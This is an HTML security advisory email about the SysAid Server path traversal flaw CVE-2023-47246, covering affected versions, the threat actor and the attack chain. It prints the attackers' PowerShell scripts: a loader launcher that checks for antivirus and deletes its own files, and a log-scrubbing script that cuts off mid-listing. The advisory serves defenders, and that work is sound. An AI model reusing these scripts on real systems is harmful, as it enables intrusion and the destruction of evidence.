<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<meta name="Generator" content="Microsoft Word 15 (filtered medium)">
<!--[if !mso]><style>v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style><![endif]--><style><!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ligatures:standardcontextual;}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:#0563C1;
text-decoration:underline;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{mso-style-priority:34;
margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ligatures:standardcontextual;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:"Calibri",sans-serif;
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;
font-family:"Calibri",sans-serif;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
@list l0
{mso-list-id:440682668;
mso-list-type:hybrid;
mso-list-template-ids:-1321561300 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l1
{mso-list-id:535898869;
mso-list-template-ids:1427391786;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Symbol;}
@list l1:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:"Courier New";
mso-bidi-font-family:"Times New Roman";}
@list l1:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level4
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level5
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level7
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level8
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l1:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l2
{mso-list-id:1149785349;
mso-list-type:hybrid;
mso-list-template-ids:135152490 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3
{mso-list-id:1270888898;
mso-list-type:hybrid;
mso-list-template-ids:-2032382722 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4
{mso-list-id:1496217853;
mso-list-type:hybrid;
mso-list-template-ids:1152963076 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5
{mso-list-id:1502815530;
mso-list-template-ids:-905037508;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Symbol;}
@list l5:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:"Courier New";
mso-bidi-font-family:"Times New Roman";}
@list l5:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level4
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level5
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level7
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level8
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l5:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l6
{mso-list-id:1573730714;
mso-list-type:hybrid;
mso-list-template-ids:56755152 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l7
{mso-list-id:2128043870;
mso-list-template-ids:-1425641224;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Symbol;}
@list l7:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:"Courier New";
mso-bidi-font-family:"Times New Roman";}
@list l7:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level4
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level5
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level7
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level8
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
@list l7:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Wingdings;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang="EN-US" link="#0563C1" vlink="#954F72" style="word-wrap:break-word">
<div class="WordSection1">
<p class="MsoNormal"><a name="_Hlk122600425">Good morning,<span style="mso-ligatures:none"><o:p></o:p></span></a></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The SOC Services team is reporting on the vulnerability:</span><span style="mso-bookmark:_Hlk122600425"><span style="font-family:"Arial",sans-serif;mso-ligatures:none">
</span><b>CVE-2023-47246 SysAid Server Path Traversal Vulnerability</b>. Due to its high visibility and knowledge of the software installed in the state environment, we are providing this in-depth information:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>History</u></b>: On November 8, 2023, SysAid published an advisory expressing that their on-premise server software had a previously undisclosed vulnerability and is aware of public in-the-wild
exploitation. Days prior, Microsoft had notified SysAid of this issue and that they attributed these compromises to TA505 “Lace Tempest”, often known as the cl0p ransomware gang. On November 13, 2023, CISA added CVE-2023-47246 to the Known Exploited Vulnerabilities
Catalog.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following products are affected:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">SysAid Server prior to 23.3.36<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Fixed version:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">SysAid Server 23.3.36<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">SysAid has provided an advisory which can be found here:
</span><a href="https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"><span style="mso-bookmark:_Hlk122600425">https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification</span><span style="mso-bookmark:_Hlk122600425"></span></a><span style="mso-bookmark:_Hlk122600425"><o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Intelligence</u></b>: As of November 8, 2023, the vulnerability has been confirmed as being exploited in the wild.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u><span style="background:yellow;mso-highlight:yellow"><o:p><span style="text-decoration:none"> </span></o:p></span></u></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Workarounds:</u></b> There are no workarounds at this time.<span style="background:yellow;mso-highlight:yellow"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u><o:p><span style="text-decoration:none"> </span></o:p></u></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>How it works</u></b>: The attacker uploads a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The attacker then uses a Powershell script
to deploy the WebShell which executes a malware loader named <i>user.exe </i>which loads the GraceWire trojan injecting into one of the processes listed below:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">Spoolsv.exe<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">msiexec.exe<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">svchost.exe<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">After initial access the attackers utilized a second PowerShell script to erase evidence associated with the attacker’s actions from the disk and the SysAid on-prem server web logs.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell script was used to launch the user.exe loader:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$wapps='C:\Program Files\SysAidServer\tomcat\webapps'<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>dir "$wapps\usersfiles"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$bp=0<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>foreach($s in tasklist) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> if ($s -match '^(Sophos).*\.exe\s') {echo $s; $bp++;}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if ($bp) { echo "`nSTOP-PROCs FOUND! Exiting`n" }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>else {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> echo "Starting user.exe"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>& "$wapps\usersfiles\user.exe"
<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Start-Sleep 1<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Remove-Item -Force "$wapps\usersfiles.war"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Remove-Item -Force "$wapps\usersfiles\user.*"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>exi<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The script performs the following actions:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Lists all files placed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Checks all running processes for any process beginning with the name “Sophos” and if found, exits.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">If no matching processes are found, starts the user.exe malware.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Pauses for a second, and then removes any files used during the attack, including the usersfiles.war file and any files matching C:\Program
Files\SysAidServer\tomcat\webapps\usersfiles\user.*<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell script was used to erase evidence:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$tomcat_dir = "E:\SysAidServer\tomcat";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$log4j_dir = "E:\SysAidServer\root\WEB-INF\logs";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>function cleanLL {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$fl = Get-ChildItem "$log4j_dir";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>for ($i=0; $i -lt $fl.Count; $i++) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> $logFile = $fl[$i].FullName;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> cp "$logFile.bck" "$logFile"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$fl = Get-ChildItem "$tomcat_dir\logs\";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>for ($i=0; $i -lt $fl.Count; $i++) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> $logFile = $fl[$i].FullName;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> if (Select-String -Pattern "$tcPattern" -Path "$logFile") {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> cp "$logFile.bck" "$logFile"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>while(1) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> while((Test-Path "$tomcat_dir\webapps\usersfiles")) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> sleep 1;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> break;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {<o:p></o:p></i></span></p>
